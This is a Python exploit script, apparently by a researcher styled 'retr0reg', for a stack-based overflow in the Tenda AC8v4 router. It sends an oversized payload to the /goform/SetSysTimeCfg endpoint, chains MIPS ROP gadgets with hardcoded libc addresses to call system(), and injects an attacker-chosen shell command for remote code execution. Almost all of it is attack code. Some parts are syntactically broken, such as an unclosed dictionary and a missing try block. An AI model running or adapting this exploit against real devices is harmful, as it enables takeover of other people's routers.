        url = f"http://{host}:{port}/goform/SetSysTimeCfg"
        _payload = b''
        _payload = b'retr0reg' + b":" + payload
        data = {

        def send_request():
                requests.post(url=url, data=data)
            except Exception as e:
                print(f"Request failed: {e}")

        thread = threading.Thread(target=send_request)

    def _rop(ropcmd: RopCmd):

        # rop-chain:
        # lw $s4 0x48; jr 0x5c
        # move $t9,$s4; jr 0x34($sp)
        # addiu $a0,$sp,0x28+var_C | jr 0x24($sp)

        # 77f59000-77fe5000 r-xp 00000000 08:01 788000 
        libc_base       = 0x77f59000        
        _system         = 0x004E630

        t9_target       = 0x77fa7630
        ret_offset      = 0x7b #  -> b'bgaa'
        sp_offset       = 0x7f # --> b'bhaa'

        sp2             = 0x60  # LOAD:0007EB7C 
        sp3             = 0x38  # LOAD:0001B038 


        log.success("Exploit started!")
        log.info(f"retaddr offset: {hex(ret_offset)}")
        log.info(f"$sp offset: {hex(sp_offset)}")
        log.info(f"libc_base -> {hex(libc_base)}")

        lw_s4_0x48_JR_5Csp    = 0x0007E8C8 # lw $s4,0x38+var_s10($sp) | jr 0x5C($sp)
        # LOAD:0007E8CC                 move    $v0, $s0
        # LOAD:0007E8D0                 lw      $fp, 0x38+var_s20($sp)
        # LOAD:0007E8D4                 lw      $s7, 0x38+var_s1C($sp)
        # LOAD:0007E8D8                 lw      $s6, 0x38+var_s18($sp)
        # LOAD:0007E8DC                 lw      $s5, 0x38+var_s14($sp)
        # LOAD:0007E8E0                 lw      $s4, 0x38+var_s10($sp)
        # LOAD:0007E8E4                 lw      $s3, 0x38+var_sC($sp)
        # LOAD:0007E8E8                 lw      $s2, 0x38+var_s8($sp)
        # LOAD:0007E8EC                 lw      $s1, 0x38+var_s4($sp)
        # LOAD:0007E8F0                 lw      $s0, 0x38+var_s0($sp)
        # LOAD:0007E8F4                 jr      $ra
        # LOAD:0007E8F8                 addiu   $sp, 0x60

        t9_EQ_s4_JR_1C_p_18   = 0x0001B014 # move $t9,$s4             | jr 0x1C+0x18($sp)
        # LOAD:0001B018                 lw      $ra, 0x1C+var_s18($sp)
        # LOAD:0001B01C                 lw      $s5, 0x1C+var_s14($sp)
        # LOAD:0001B020                 lw      $s4, 0x1C+var_s10($sp)
        # LOAD:0001B024                 lw      $s3, 0x1C+var_sC($sp)
        # LOAD:0001B028                 lw      $s2, 0x1C+var_s8($sp)
        # LOAD:0001B02C                 lw      $s1, 0x1C+var_s4($sp)
        # LOAD:0001B030                 lw      $s0, 0x1C+var_s0($sp)
        # LOAD:0001B034                 jr      $ra
        # LOAD:0001B038                 addiu   $sp, 0x38

        a0_EQ_sp24_c_JR_24sp  = 0x0004D144 # addiu $a0,$sp,0x24+var_C | jr 0x24($sp)
        # LOAD:0004D144                 addiu   $a0, $sp, 0x24+var_C
        # LOAD:0004D148                 lw      $ra, 0x24+var_s0($sp)
        # LOAD:0004D14C                 nop
        # LOAD:0004D150                 jr      $ra

        a0_EQ_sp28_c_JR_24sp  = 0x00058920 # addiu $a0,$sp,0x28+var_C | jr 0x24($sp)
        # LOAD:00058920                 addiu   $a0, $sp, 0x28+var_C
        # LOAD:00058924                 lw      $v1, 0x28+var_C($sp)
        # LOAD:00058928                 lw      $ra, 0x28+var_4($sp)
        # LOAD:0005892C                 sw      $v1, 0($s0)
        # LOAD:00058930                 lw      $s0, 0x28+var_8($sp)
        # LOAD:00058934                 jr      $ra

        log.info(f"gadget lw_s4_0x48_JR_5Csp   -> {hex(libc_base + lw_s4_0x48_JR_5Csp)}")
        log.info(f"gadget t9_EQ_s4_JR_1C_p_18  -> {hex(libc_base + t9_EQ_s4_JR_1C_p_18)}")
        log.info(f"gadget a0_EQ_sp24_c_JR_24sp -> {hex(libc_base + a0_EQ_sp24_c_JR_24sp)}")
        log.info(f"_system                     -> {hex(libc_base + _system)}")

        c1 = ""
        c2 = ""

        c3 = "output=$(tftp 2>&1);spec=${output:47:1};" + ropcmd[1].replace('-','$(echo $spec)')

        log.info(f"Inject $a0: {c3}")

        _payload = {
                ret_offset: libc_base + lw_s4_0x48_JR_5Csp, # flow1
                (sp_offset + 0x48): t9_target,
                (sp_offset + 0x38 + 0x18): f'{c2}'.encode(), # $s6, 0x38+var_s18($sp)
                (sp_offset + 0x5c): libc_base + t9_EQ_s4_JR_1C_p_18, # flow2
                (sp_offset + sp2 + 0x1C + 0x10): f'{c1}'.encode(), # flow2 $s4-$s5 (caller), this is set via previous control-ed registers
                (sp_offset + sp2 + 0x34): libc_base + a0_EQ_sp24_c_JR_24sp, 
                (sp_offset + sp2 + sp3 + 0x24): libc_base + _system, # flow3
                (sp_offset + sp2 + sp3 + 0x24 + 0xC - 0x7): f'$({c3});'.encode()

        log.success("Stack looks like:")
        for key, value in _payload.items():
                log.info(f"offset: {hex(key)} : {hex(value)}")
            except TypeError:

        # $sp growth  -> +0x60 -> 0x38 
        # | retaddr             | lw_s4_0x48_JR_5Csp   |  i. (gadget address) 
        # | (current sp)        |                      |     ($spsz1=0d127)
        # | $sp1+0x48           | t9_target            |  i ->  $s4  
        # | $sp2+0x5c           | t9_EQ_s4_JR_1C_p_18  |  ii <- $t9 ($spsz2+=0x60)
        # | $sp1+$sp2+$sp3-0xC  | command              |  <- $a0
        # | $sp1+$sp2+0x34      | a0_EQ_sp24_c_JR_24sp |  iii. ($spsz3+=38)
        # | $sp1+$sp2+$sp3+0x24 | _system              |  <- jmp

        return flat(_payload)

    payload = _rop(ropcmd)

    log.critical("Recieved shell!")

if __name__ == "__main__":
    ropcmd, host, port = ap()
    log.info("0reg.dev - retr0reg")
    log.info("Tenda AC8v4 stack-based overflow")
        __________        __          _______                        
        \______   \ _____/  |________ \   _  \_______   ____   ____  
        |       _// __ \   __\_  __ \/  /_\  \_  __ \_/ __ \ / ___\ 
        |    |   \  ___/|  |  |  | \/\  \_/   \  | \/\  ___// /_/  >
        |____|_  /\___  >__|  |__|    \_____  /__|    \___  >___  / 
                \/     \/                    \/            \/_____/  
    log.info("RCE via Mipsel ROP")
    pwn(ropcmd, host, port)